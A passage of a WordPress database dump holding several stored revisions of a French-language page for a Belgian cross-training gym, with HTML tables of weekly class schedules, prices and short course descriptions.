mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:30:27', '2013-07-03 17:30:27', '', 11, 'http://www.crosstrainingcenter.be/?p=186', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(185, 1, '2013-07-03 17:28:40', '2013-07-03 17:28:40', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\" >MARDI</td>\r\n<td class=\"ttitreh\" >MERCREDI</td>\r\n<td class=\"ttitreh\" >JEUDI</td>\r\n<td  class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td  class=\"ttitre\">17h30</td>\r\n<td  class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:28:40', '2013-07-03 17:28:40', '', 11, 'http://www.crosstrainingcenter.be/?p=185', 0, 'revision', '', 0),
(184, 1, '2013-07-03 17:24:45', '2013-07-03 17:24:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\" >MARDI</td>\r\n<td class=\"ttitre\" >MERCREDI</td>\r\n<td class=\"ttitre\" >JEUDI</td>\r\n<td  class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td  class=\"ttitre\">17h30</td>\r\n<td  class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td >TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:24:45', '2013-07-03 17:24:45', '', 11, 'http://www.crosstrainingcenter.be/?p=184', 0, 'revision', '', 0),
(189, 1, '2013-07-03 17:38:00', '2013-07-03 17:38:00', '<h2>Team Training :</h2>\r\n<h4>En semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Le week-end :</h4>\r\n\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; 